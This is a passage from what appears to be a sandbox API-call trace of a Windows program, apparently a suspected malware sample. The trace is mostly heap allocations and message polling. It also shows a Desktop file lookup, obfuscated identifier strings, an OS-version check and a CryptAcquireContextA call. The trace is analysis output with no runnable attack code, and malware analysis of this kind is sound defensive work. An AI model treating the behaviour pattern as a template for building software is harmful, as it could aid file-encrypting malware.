(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0103.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0103.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0103.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.884] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/og9u_G4EHl49Tl.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 0x9a3b80 [0103.884] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.884] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0103.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0103.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0103.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0103.885] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0103.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.886] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0103.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.886] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.886] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.886] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.886] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0103.886] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.887] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.887] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.888] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.888] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.888] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0103.888] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0103.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.889] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0103.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.889] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0103.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0103.889] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.889] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.889] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0103.889] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.889] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0103.889] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0103.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0103.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0103.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0103.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0103.890] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be918) returned 1 [0103.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.890] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.891] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.891] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb 